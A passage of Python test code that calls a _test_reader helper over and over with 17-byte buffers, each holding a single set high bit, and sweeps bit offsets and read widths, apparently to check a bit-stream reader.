_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 45, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 44, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 43, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 42, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 41, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 40, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 39, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 38, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 37, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 36, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 35, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 34, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 33, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 32, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 31, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 30, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 29, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 28, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 27, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 26, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 25, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 24, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 23, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 22, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 21, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 20, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 19, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 18, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 17, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 16, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 15, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 14, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 13, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 12, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 11, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 10, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 9, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 64, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 63, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 62, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 61, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 60, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 59, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 58, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 57, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 56, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 55, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 54, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 53, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 52, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 51, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 50, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 49, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 48, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 47, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 46, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 45, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 44, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 43, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 42, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 41, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 40, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 39, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 38, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 37, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 36, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 35, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 34, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 33, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 32, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 31, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 30, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 29, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 28, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 27, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 26, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 25, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 24, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 23, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 22, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 21, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 20, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 19, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 18, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 17, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 16, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 15, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 14, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 13, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 12, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 11, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 10, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 9, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 64, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 63, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 62, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 61, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 60, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 59, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 58, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 57, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 56, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 55, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 54, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 53, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 52, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 51, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 50, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 49, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 48, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 47, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 46, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 45, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 44, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 43, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 42, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 41, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 40, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 39, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 38, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 37, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 36, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 35, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 34, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 33, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 32, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 31, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 30, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 29, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 28, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 27, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 26, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 25, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 24, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 23, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 22, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 21, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 20, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 19, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 18, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 17, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 16, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 15, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 14, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 13, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 12, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 11, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 10, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 9, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 64, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 63, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 62, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 61, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 60, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 59, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 58, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 57, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 56, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 55, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 54, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 53, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 52, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 51, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 50, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 49, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 48, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 47, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 46, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 45, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 44, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 43, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 42, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 41, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 40, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 39, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 38, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 37, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 36, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 35, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 34, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 33, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 32, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 31, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 30, False, 1)
